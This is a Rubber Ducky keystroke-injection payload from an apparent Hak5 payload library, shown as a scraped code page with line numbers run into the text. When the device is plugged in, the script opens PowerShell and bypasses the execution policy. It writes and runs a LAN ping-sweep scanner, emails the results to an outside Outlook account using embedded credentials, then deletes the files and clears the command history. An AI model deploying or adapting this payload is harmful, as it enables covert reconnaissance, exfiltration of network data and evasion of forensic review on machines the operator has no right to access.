Path: blob/master/payloads/library/exfiltration/Poor_Mans_Nmap/payload.txt
2968 views
REM Title: Poor_Mans_Nmap1REM Author: JoustingZebra2REM Description: Scans the LAN with PowerShell. Then emails results using outlook.3REM Target: Windows with powershell v5/7.4REM Props: Hak5, the-jcksn5REM Version: 1.06REM Category: Exfiltration789DELAY 100010GUI r11DELAY 100012REM Open Powershell, noprofile, noninteractive13STRING powershell.exe -Nop -Noni14ENTER15DELAY 1001617REM Write .ps1 file18REM Scanner only works on class "B" and smaller networks.19REM Script is optimized, only scans valid IP addresses in the network.20REM Only scans first LAN it finds.21REM IPv4 only :(2223STRING Write-Output "function Get-BroadAddr (`$AddrAndCIDR){ `n `$AddrAndCIDR = `$AddrAndCIDR.Split(`"/`") `n `$AddrInBin = (New-IPv4toBin `$AddrAndCidr[0]).ToCharArray() `n for(`$i=0;`$i -lt `$AddrInBin.length;`$i++){ `n if(`$i -ge `$AddrAndCIDR[1]) `n { `n `$AddrInBin[`$i] = `"1`" `n `n} `n } `n [string[]]`$AddrInInt32 = @() `n for (`$i = 0;`$i -lt `$AddrInBin.length;`$i++){ `n `$PartialAddrBin += `$AddrInBin[`$i] `n if((`$i+1)%8 -eq 0){ `n `$PartialAddrBin = `$PartialAddrBin -join `"`" `n `$AddrInInt32 += [Convert]::ToInt32(`$PartialAddrBin -join `"`",2) `n `$PartialAddrBin = `"`" `n } `n } `n `$AddrInInt32 = `$AddrInInt32 -join `".`" `n return `$AddrInInt32 `n } `n function New-IPv4toBin (`$ipv4){ `n `$BinNum = `$ipv4 -split '\.' | ForEach-Object {[System.Convert]::ToString(`$_,2).PadLeft(8,'0')} `n return `$binNum -join `"`" `n } `n `$Adapter = (Get-NetAdapter | Where-Object {`$_.status -eq 'Up'} | Select-Object -First 1) `n `$AdapterAddr=(Get-NetIPAddress -InterfaceIndex `$Adapter.ifIndex | Where-Object {`$_.ipv4address}) `n `$IPaddr=[ipaddress](`$AdapterAddr.IPAddress) `n `$CIDRSubMask=(Get-NetIPAddress -InterfaceIndex `$Adapter.ifIndex | Select-Object -ExpandProperty PrefixLength) `n `$IPAddrAndMask=(`$IPaddr | select-object -ExpandProperty IPAddressToString ) + `"/`" +(`$CIDRSubMask | Out-String) `n Write-Host `"Localhost = `$IPaddrAndMask`" `n `$SubMask = [ipaddress]([math]::pow(2, 32) -1 -bxor [math]::pow(2, (32 - `$CIDRSubMask))-1) `n Write-Host `"Subnet mask = `$SubMask`" `n `$NetAddr=[ipaddress](`$IPaddr.address -band `$SubMask.address) `n Write-Host `"Network Address = `$NetAddr`" `n `$NetAddrOctet0=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[0] `n `$NetAddrOctet1=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[1] `n `$NetAddrOctet2=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[2] `n `$NetAddrOctet3=[int]([System.Net.IpAddress]::Parse(`$NetAddr)).GetAddressbytes()[3] `n `$BroadAddr=[ipaddress](Get-BroadAddr(`$IPAddrAndMask)) `n Write-Host `"Broadcast Address = `$BroadAddr`" `n `$BroadAddrOctet2=[int]([System.Net.IpAddress]::Parse(`$BroadAddr)).GetAddressbytes()[2] `n `$BroadAddrOctet3=[int]([System.Net.IpAddress]::Parse(`$BroadAddr)).GetAddressbytes()[3] `n Write-Host `"`n`" `n Write-Host `"### Scanning Network `$NetAddr - `$BroadAddr ###`" `n Write-Host `"`n`" `n for(`$i=`$NetAddrOctet3+1; `$i -lt `$BroadAddrOctet3 ; `$i++){ `n `$pcomplete = (`$i / `$BroadAddrOctet3) * 100 `n `$PingAddr=[string]([string]`$NetAddrOctet0 + `".`" + [string]`$NetAddrOctet1 + `".`" + [string]`$NetAddrOctet2 + `".`" + [string]`$i) `n Write-Progress -Activity Scanning -Status 'Progress->' -PercentComplete `$pcomplete -CurrentOperation OuterLoop `n if ((Test-Connection `$PingAddr -Quiet -Count 1) -and ([string]`$IPaddr -ne `$PingAddr)){ `n `$Output=`$(Get-NetNeighbor -IPAddress `$PingAddr -ErrorAction SilentlyContinue | Select-Object -Property IPAddress,LinkLayerAddress,State | Format-Table -HideTableHeaders | Out-String) `n `$Output=(`$Output -replace `"`n`",`"`") `n Write-Host `$Output `n } `n if (`$NetAddrOctet2 -ne `$BroadAddrOctet2){ `n for (`$j=`$NetAddrOctet2+1; `$j -lt `$BroadAddrOctet2 ; `$j++){ `n `$pincomplete = (`$j / `$BroadAddrOctet2) * 100 `n Write-Progress -Id 1 -Activity Updating -Status 'Progress' -PercentComplete `$pincomplete -CurrentOperation InnerLoop `n if (Test-Connection `$PingAddr -Quiet -Count 1){ `n Write-Host `$PingAddr `n } `n } `n } `n } `n " | Out-File $ENV:temp/netscan.ps124ENTER25DELAY 100026REM Give process ability to run unsigned scripts27STRING Set-ExecutionPolicy Bypass -Scope Process28DELAY 10029ENTER30DELAY 10031STRING cd $ENV:temp32DELAY 10033ENTER34DELAY 1003536REM Execute and email results as .txt file37REM Line condensed into one so the rubber ducky can be removed without waiting for the script to finish.38REM The script is not multi-threaded, so it takes about 6 minutes to scan a class "C" subnet.39REM Conducts cleanup and removes history to protect email creds.4041REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~42STRING .\netscan.ps1 | Out-File netscan.txt && Send-MailMessage -From [email protected] -To [email protected] -Subject "LAN scan" -Body "From Rubber Ducky" -Attachment $ENV:temp\netscan.txt -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList [email protected], (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force)) && Remove-Item netscan.* -Force && Remove-Item (Get-PSReadlineOption).HistorySavePath -Force && Clear-History43DELAY 10044ENTER45REM 27.3 hour delay to allow script full time to scan a class "B" subnet then close process46DELAY 1000047REPEAT 983148STRING EXIT49DELAY 10050ENTER51525354